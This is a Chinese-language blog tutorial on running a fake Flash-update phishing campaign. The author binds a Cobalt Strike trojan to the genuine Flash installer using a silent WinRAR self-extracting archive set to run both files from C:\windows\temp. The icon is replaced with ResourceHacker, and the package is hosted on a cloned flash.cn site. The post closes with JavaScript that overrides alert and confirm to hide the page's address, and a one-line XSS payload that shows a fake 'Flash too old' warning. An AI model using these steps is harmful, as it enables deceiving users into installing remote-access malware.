Flash水坑钓鱼

起因

在网络上看到许多大佬都拿这个钓鱼,而且感觉成功率贼高。
未雨绸缪,先测试一下,以后肯定用的到

准备

flash官网的钓鱼源码:https://github.com/r00tSe7en/Fake-flash.cn
一个服务器
一个域名
一个马子

先配置一个马子吧

  • 使用常用的CS吧,随便来一个,成功上线
    在这里插入图片描述
  • 关于免杀,暂时就不了(因为菜)
  • 推荐使用一个好的隐藏方式

自解压捆绑文件的利用

捆版木马时碰到一个问题大多捆绑软件本身就会被杀软查杀,所以选择利用winrar实现捆绑。

  1. 准备好的木马和flash安装程序

  2. 鼠标右键,添加到压缩文件。

点击创建自解压格式压缩文件
![在这里插入图片描述](/images/20200206110906864.png
4. 点击高级自解压选项——————-常规
在这里插入图片描述

1
使用绝对路径 -------------- C:\windows\temp

在这里插入图片描述

  1. 设置---------提取后运行

1
2
3
C:\windows\temp\flash.exe

C:\windows\temp\flashplayer_install_cn.exe

在这里插入图片描述

  1. 安静模式———全部隐藏

在这里插入图片描述

  1. 更新

1
2
3
更新方式----解压并更新文件

覆盖方式----覆盖所有文件

在这里插入图片描述

  1. 确定,出去把文件名改的像一点
    在这里插入图片描述
  2. 这图标也不像啊,得改
    在这里插入图片描述
  3. 使用 ResourceHacker 把图标改了,自行下载
  4. 通过ResourceHacker打开原版的flash安装程序,点击Icon Group文件夹中的文件,鼠标右键保存“*.ico资源”,即可导出ico图标。
    在这里插入图片描述
  5. 同样的方法—-ResourceHacker打开刚刚打包好的文件,点击Icon Group文件夹中的文件,鼠标右键替换ico图标,最后保存

![在这里插入图片描述](/images/20200206115439272.png
![在这里插入图片描述](/images/20200206115637855.png
最后保存成功,图标搞定图标搞定

  • 捆绑木马就做好了。下面是运行截图,伪装的完美,全程无感知,就是没有做木马的免杀如果有杀毒软件会报毒。
  • 在这里插入图片描述
  • 也能上线在这里插入图片描述
  • 马子完成了。

上传到服务器

跟前情况自己开服务,我就直接装了了一个Apache
![在这里插入图片描述](/images/20200206152501383.png
修改fake网站的源码,把链接加进去。

![在这里插入图片描述](/images/20200206153316957.png
上传到服务器看效果

![在这里插入图片描述](/images/20200206155353255.png
还可以,就是域名方面需要进一步的伪造,要买一个不错的域名更佳

常见用法

直接给地址让下载这个可能性太低了,感觉还是需要XSS打进去,弹框提示上钩的几率最大,这也大家常用的方法之一。
但是有个问题不能让看出是弹窗,最后是可以隐藏掉网站显示

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
//重写alert方法,去掉地址显示
window.alert = function(name){
var iframe = document.createElement("IFRAME");
iframe.style.display="none";
iframe.setAttribute("src", 'data:text/plain,');
document.documentElement.appendChild(iframe);
window.frames[0].window.alert(name);
iframe.parentNode.removeChild(iframe);
}

//重写confirm方法,去掉地址显示
window.confirm = function(name){
var iframe = document.createElement("IFRAME");
iframe.style.display="none";
iframe.setAttribute("src", 'data:text/plain,');
document.documentElement.appendChild(iframe);
var result = window.frames[0].window.confirm(name);
iframe.parentNode.removeChild(iframe);
return result;
}

在这里插入图片描述

1
window.alert = function(name){var iframe = document.createElement("IFRAME");iframe.style.display="none";iframe.setAttribute("src", 'data:text/plain,');document.documentElement.appendChild(iframe);window.frames[0].window.alert(name);iframe.parentNode.removeChild(iframe);};alert("您的FLASH版本过低,请尝试升级后访问改页面!");window.location.href="https://www.baidu.com";

可以直接在XSS平台里面建一个模块,然后xss打出去,要不太长了代码